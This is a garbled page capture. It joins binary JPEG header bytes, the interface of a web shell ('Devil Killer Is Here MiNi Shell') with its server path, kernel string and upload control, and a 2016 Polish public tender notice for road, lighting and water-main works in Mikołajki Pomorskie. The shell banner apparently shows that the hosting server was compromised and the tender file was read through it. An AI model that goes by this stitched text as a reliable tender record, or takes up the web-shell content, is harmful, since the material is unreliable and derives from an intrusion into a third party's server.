JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20161010/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20161010/320345-N-2016.html

<div class="divRow_xforms"><div>
              Ogłoszenie nr 320345 - 2016
              z dnia 2016-10-10 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Mikołajki Pomorskie:   Przebudowa  ulicy Kościelnej, Piaskowej i Akacjowej, budowa zjazdów, odwodnienia, oświetlenia ulicznego ulicy Akacjowej  oraz przebudowę sieci wodociągowej ulicy Kościelnej, Dzierzgońskiej, Akacjowej Słonecznej na działkach nr 119, 129/3, 130/17, 228, 231, 233, 237/2, 244/1, 244/2, 427 obręb  ewid. Mikołajki Pomorskie poza pasem drogi wojewódzkiej ( dz. nr 339/1).

<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Roboty budowlane
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                tak
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                tak
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                tak
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                tak
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Urząd Gminy Mikołajki Pomorskich, krajowy numer identyfikacyjny
              53451700000, ul.
              ul. Dzierzgońska 
              2,
              82433  
              Mikołajki Pomorskie, woj.
              pomorskie, państwo
              , tel.
              055 6404357 w. 20, e-mail
              b.podlaska@wp.pl, faks
              556 404 461.
              <br />
              Adres strony internetowej (URL): www.mikolajkipomorskie.p<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />www.mikolajkpoorskie.pl</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.mikolajpomorskie.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />W formie pisemnej w zamknietym, nieprzezroczystym opakowaniu  zaadresowanym na adres Zmawiającego Gmina Mikołajki Pomorskie, ul. Dzierzgońska 2, 82-433 Mikołajki Pomorskie<br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br />
                Adres:
                <br /></div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>  Przebudowa  ulicy Kościelnej, Piaskowej i Akacjowej, budowa zjazdów, odwodnienia, oświetlenia ulicznego ulicy Akacjowej  oraz przebudowę sieci wodociągowej ulicy Kościelnej, Dzierzgońskiej, Akacjowej Słonecznej na działkach nr 119, 129/3, 130/17, 228, 231, 233, 237/2, 244/1, 244/2, 427 obręb  ewid. Mikołajki Pomorskie poza pasem drogi wojewódzkiej ( dz. nr 339/1).

<br /><b>Numer referencyjny: </b>RG.II.21.4.201<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                roboty budowlane
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Nie
                </div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Przedmiot opracowania obejmuje  przebudowę:
- ul. Kościelnej ( w odcinkach)
 A- B o długości 125,63 m	
 C- D o długości 138,04 m	
 E- F o długości 43,94 m
- zmianę nawierzchni z nie utwardzonej na utwardzoną ( kostka betonowa )
- umocnienie skarpy płytami ażurowymi
- budowę miejsc postojowych dla samochodów osobowych
- budowę studni chłonnych oraz wpustów ulicznych wody deszczowej
	
Przedmiot opracowania obejmuje  przebudowę:
- ul. Akacjowej o długości 427,69 m
- zmianę nawierzchni z nie utwardzonej na utwardzoną ( kostka betonowa)
- wybudowanie zjazdów do posesji
- budowę chodnika
- budowę kanalizacji deszczowej, studni chłonnych oraz wpustów ulicznych wody deszczowej
- rekultywacja zieleni	

Przedmiotem opracowania jest  również  projekt budowlany instalacji elektrycznej oświetlenia drogowego ul. Akacjowej w Mikołajkach Pomorskich	
Zakres opracowania obejmuje wykonanie instalacji oświetlenia w zakres której wchodzi budowa:
 linii kablowych zasilających oprawy oświetlenia ulicznego,  wykonane kablem    
 YAKXS 4x35mm^2.
 słupów oświetleniowych wysokości 5m, z wysięgnikiem o wysięgu 1m  i  z fundamentami prefabrykowanymi FBw-100 , 
 oprawy oświetleniowe typu LED,
 uziemienia ochronne
Projekt przedstawia rozwiązania zasadniczych elementów wyposażenia instalacyjnego elektrycznego.
Przedmiot opracowania obejmuje przebudowę:
-ul Piaskowej o długości 185,5 m
- zmianę nawierzchni z nie utwardzonej na utwardzoną ( kostka betonowa)
- wybudowanie zjazdów do posesji
- budowę chodnika
- rekultywację zieleni
<br /><br /><b>II.5) Główny kod CPV: </b>45233123-7<br /><b> Dodatkowe kody CPV:</b>45316119-9,
                <br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 31/05/2017<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Zamawiający nieokreśla warunku udziału w postępowaniu w tym zakresie<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną nie niższą niż 300 000 złotych<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Wykonawca spełni warunek, jeżeli wykaże , że w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy w tym okresie wykonywał co najmniej dwie roboty budowlane polegające na budowie, remoncie dróg, o wartości nie mniejszej niż 300 000 złotych z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów na 

rzecz których roboty te zostały wykonane  z załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym, czy te  roboty budowlane zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone. Dowodami  o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać  tych dokumentów- inne dokumenty zgodnie z załącznikiem nr 5 do SIWZ.
2.2.2. Wykonawca musi wykazać, że dysponuje, bądź będzie dysponował osobami, które będą uczestniczyć w wykonaniu zamówienia tj,
1/ osoba, która będzie pełnić funkcję kierownika  budowy posiadającą uprawnienia do kierowania robotami budowlanymi w specjalności  drogowej,
2/ osobami, które będą  pełnić funkcje kierowników robót, posiadającymi uprawnienia  do kierowania robotami budowlanymi w specjalnościach  elektrycznej zgodnie z załącznikiem nr 4 do SIWZ

UWAGA
1.	Kierownik budowy powinien posiadać uprawnienia budowlane zgodnie z ustawą z dnia 07 lipca 1994r. Prawo budowlane (tj. Dz. U. z 2016 r. poz. 290 z późn. zm.) oraz  rozporządzeniem ministra Infrastruktury i Rozwoju z dnia 11 września 2014r. w sprawie samodzielnych funkcji technicznych w budownictwie( Dz. U. 2014r. poz. 1278) lub odpowiadające im ważne uprawnienia budowlane , które zostały wydane na podstawie wcześniej  obowiązujących przepisów
2.	Zgodnie z art. 12a ustawy Prawo budowlane samodzielne funkcje techniczne w budownictwie, określone w art. 12 ust.1 ustawy mogą również wykonywać osoby, których odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach odrębnych. Regulację odrębną stanowią przepisy ustawy z dnia 18 marca 2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych państwach członkowskich Unii Europejskiej ( tj. Dz.U. Nr 63 poz. 294 z późn. zm).
3.	2/ Oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia wskazane w wykazie, o którym mowa wyżej, posiadają wymagane przepisami ustawy Prawo budowlane uprawnienia wraz z aktualnymi zaświadczeniami o wpisie do właściwej Okręgowej Izby Samorządu Zawodowego.( Treść Oświadczenia Zamawiającego przekazuje na Załączniku nr 4).
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                1/Kierownik budowy powinien posiadać uprawnienia  budowlane zgodnie z ustawą z dnia 07 lipca 1994r. Prawo budowlane (tj. Dz.U. z 2016 r. poz. 290 z późn. zm.) oraz  rozporządzeniem ministra Infrastruktury i Rozwoju z dnia 11 września 2014 r. w sprawie samodzielnych funkcji technicznych w budownictwie( Dz. U. 2014r. poz. 1278) lub odpowiadające im ważne uprawnienia budowlane , które zostały wydane na podstawie wcześniej obowiązujących przepisów.
Zgodnie z art. 12a ustawy Prawo budowlane samodzielne funkcje techniczne w budownictwie, określone w art. 12 ust.1 ustawy mogą również wykonywać osoby, których odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach odrębnych. Regulację odrębną stanowią przepisy ustawy z dnia 18 marca 2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych państwach członkowskich Unii Europejskiej ( tj. Dz.U. Nr 63 poz. 294 z późn.zm).
</div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 4 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">odpisu  z właściwego rejestru lub centralnej ewidencji informacji o działalności   
      gospodarczej , jeżeli odrębne przepisy wymagają wpisu do rejestru lub  ewidencji, w    
      celu    potwierdzenia braku podstaw do wykluczenia na podstawie  art.24 ust. 5 pkt 1   
      ustawy,
1.2. zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego,  że   
      wykonawca   nie zalega z opłacaniem podatków, wystawionego nie wcześniej niż 3   
      miesiące przed upływem    terminu składania ofert albo  wniosków o dopuszczenie do  
      udziału w postępowaniu , lub  innego dokumentu potwierdzającego, że Wykonawca  
      zawarł porozumienie z właściwym   organem podatkowym w sprawie spłat tych   
      należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał 
      przewidziane prawem zwolnienie, odroczenie lub   rozłożenie na raty zaległych  
      płatności lub wstrzymanie w całości wykonania decyzji właściwego  organu.
1.3	Zaświadczenia właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń   
      Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego albo innego dokumenty  
      potwierdzającego, że Wykonawca nie zalega z opłacaniem składek na  ubezpieczenie    
      społeczne    lub zdrowotne, wystawionego nie wcześniej niż 3 miesiące przed    
      upływem terminu składania  ofert albo wniosków o dopuszczenie do udziału w   
      postępowaniu, lub innego dokumentu  potwierdzającego, z Wykonawca zawarł 
      porozumienie  z właściwym organem    podatkowym w  sprawie spłat tych należności 
      wraz z ewentualnymi odsetkami lub grzywnami  w szczególności uzyskał przewidziane  
      prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub   
     wstrzymanie w całości wykonania decyzji właściwego organu.
	
</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />3.1dokumentu potwierdzającego, że Wykonawca jest bez[pieczony od odpowiedzialności cywilnej w zakresie prowadzenia działalności zwianej z przedmiotem  zamówienia na sumę gwarancyjna nie niższą niż 300 000 złotych )( oryginał lub kopia dokumentu poświadczona za zgodność z oryginałem przez Wykonawcę lub upoważnionego przedstawiciela wykonawcy).
W celu wykazania spełnienia warunku z pkt.2.2.1;
3.2 wykazu robót budowlanych w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert 
  a jeżeli okres prowadzenia działalności jest krótszy w tym okresie wykonywał co najmniej  
  dwie roboty budowlane polegające  na budowie, przebudowie i remoncie dróg o wartości  
  nie mniejszej niż 300 000 złotych brutto z podaniem ich  rodzaju, wartości, daty, miejsca 
  wykonania i podmiotów na rzecz, których roboty te zostały wykonane, z załączeniem 
  dowodów określających, czy roboty budowlane zostały wykonane należycie , w  
  szczególności informacji o tym, czy te roboty zostały wykonane  zgodnie z przepisami 
  prawa budowlanego i  prawidłowo ukończone. Dowodami , o których mowa, są referencje     
  bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były 
  wykonywane, a jeżeli z uzasadnionej przyczyny o charakterze  obiektywnym Wykonawca   
  nie jest w stanie uzyskać tych dokumentów - inne dokumenty zgodnie z załącznikiem nr 5  
  do SIWZ.
W celu wykazania spełnienia warunku z pkt 2.2.2.:
3.3 wykazu osób skierowanych przez Wykonawcę do realizacji zamówienia publicznego, tj, 1osoby, która będzie pełnić funkcję kierownika budowy posiadająca
 uprawnienia do kierowania robotami budowlanym  w specjalności drogowej  oraz  1 osoby , która będzie pełnić funkcję kierownika budowy w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektroenergetycznych bez ograniczeń, zgodnie z załącznikiem nr 4 do SIWZ
Uwaga.

1/Kierownik budowy powinien posiadać uprawnienia  budowlane zgodnie z ustawą z dnia 07 lipca 1994r. Prawo budowlane (tj. Dz.U. z 2016 r. poz. 290 z późn. zm.) oraz  rozporządzeniem ministra Infrastruktury i Rozwoju z dnia 11 września 2014 r. w sprawie samodzielnych funkcji technicznych w budownictwie( Dz. U. 2014r. poz. 1278) lub odpowiadające im ważne uprawnienia budowlane , które zostały wydane na podstawie wcześniej obowiązujących przepisów.
Zgodnie z art. 12a ustawy Prawo budowlane samodzielne funkcje techniczne w budownictwie, określone w art. 12 ust.1 ustawy mogą również wykonywać osoby, których odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach odrębnych. Regulację odrębną stanowią przepisy ustawy z dnia 18 marca 2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych państwach członkowskich Unii Europejskiej ( tj. Dz.U. Nr 63 poz. 294 z późn.zm).
2/ Oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia wskazane w wykazie, o którym mowa wyżej, posiadają wymagane przepisami ustawy Prawo budowlane uprawnienia wraz z aktualnymi zaświadczeniami o wpisie do właściwej Okręgowej Izby Samorządu Zawodowego.( Treść Oświadczenia Zamawiającego przekazuje na Załączniku nr 4).

4.Dokumenty podmiotów zagranicznych 

4.1.Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentu wymienionego w Części VII pkt 1.1. SIWZ składa dokument lub    dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzające,  że nie otwarto jego likwidacji ani nie ogłoszono upadłości.

        4.2.Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytoriu 
           Rzeczypospolitej Polskiej, zamiast dokumentów wymienionych w Części VII pkt 
         pkt 1.2.i pkt 1.3 składa dokument lub dokumenty wystawione w kraju, 
          w którym Wykonawca  ma siedzibę lub miejsce zamieszkania potwierdzające, że 
         nie zalega z opłacaniem podatków, opłat, składek na ubezpieczenie społeczne 
         lub zdrowotne albo zawarł porozumienie z właściwym organem w sprawie    
          spłat tych należności wraz z  ewentualnymi   odsetkami lub grzywnami, w  
         szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub  
         rozłożenie na raty zaległych płatności lub wstrzymanie w całości  wykonania    
           decyzji właściwego organu.
4.3.Dokument, o którym mowa w pkt 4.1., powinien być wystawiony nie wcześniej    
     niż 6  miesięcy przed upływem terminu składania ofert.
4.4.Dokument, o którym mowa w pkt 4.2., powinien być wystawiony nie wcześniej    
    niż 3  miesiące przed upływem terminu składania ofert.
 4.5.Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania ma 
        osoba,   której dokument dotyczy, nie wydaje się dokumentów w pkt 4.1. i 4.2., zastępuje się  je dokumentem zawierającym odpowiednio oświadczenie 
    Wykonawcy, ze wskazaniem   osoby albo osób uprawnionych do jego 
   reprezentacji lub oświadczenie osoby, której    dokument miał dotyczyć, złożone   
      przed notariuszem lub przed organem sądowym, administracyjnym albo    
   organem samorządu zawodowego lub gospodarczego właściwym  ze względu  
   na siedzibę lub miejsce zamieszkania Wykonawcy lub miejsce  zamieszkania tej 
  osoby. Zapisy pkt 4.3. i 4.4. stosuje się odpowiednio.


<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
